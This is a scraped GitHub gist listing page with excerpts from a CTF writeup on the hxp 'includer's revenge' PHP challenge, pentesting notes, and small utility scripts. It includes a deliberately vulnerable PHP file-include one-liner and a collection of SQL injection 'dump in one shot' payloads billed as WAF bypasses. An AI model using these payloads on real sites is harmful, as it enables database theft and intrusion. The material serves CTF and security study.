Skip to content

Instantly share code, notes, and snippets.

View getv's full-sized avatar

getv

3 followers · 2 following
View GitHub Profile
@loknop
loknop / writeup.md
Created December 30, 2021 14:59
Solving "includer's revenge" from hxp ctf 2021 without controlling any files

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

@zetc0de
zetc0de / dios-bypass-waf.txt
Last active May 2, 2024 09:05
DIOS (Dump In One Shoot) Collection bypass WAF
DIOS (Dump In One Shot) Collection
=======================================
concat_ws('<br>','zet',database(),version(),user(),@@hostname,(select(group_concat('<br>',table_name,':',column_name))from(information_schema.columns)where(table_Schema=database())))
(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.schemata)%20where%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,schema_name))))x)
(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.tables)%20where%20(table_schema=database())%20and%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,table_name))))x)
@jeremypruitt
jeremypruitt / CheatSheet-Pentesting.md
Last active April 1, 2024 10:14
Pentesting Cheatsheet

Reminders

Remember to log all the things!

  • Metasploit - spool /home//.msf3/logs/console.log
  • Save contents from each terminal!
  • Linux - script myoutput.txt # Type exit to stop

Setup

@magnetikonline
magnetikonline / dumprequest.php
Last active April 30, 2024 08:01
PHP script to dump full HTTP request to file (method, HTTP headers and body).
<?php
// https://gist.github.com/magnetikonline/650e30e485c0f91f2f40
class DumpHTTPRequestToFile {
public function execute($targetFile) {
$data = sprintf(
"%s %s %s\n\nHTTP headers:\n",
$_SERVER['REQUEST_METHOD'],
$_SERVER['REQUEST_URI'],
$_SERVER['SERVER_PROTOCOL']
@UniIsland
UniIsland / SimpleHTTPServerWithUpload.py
Created August 14, 2012 04:01
Simple Python Http Server with Upload
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""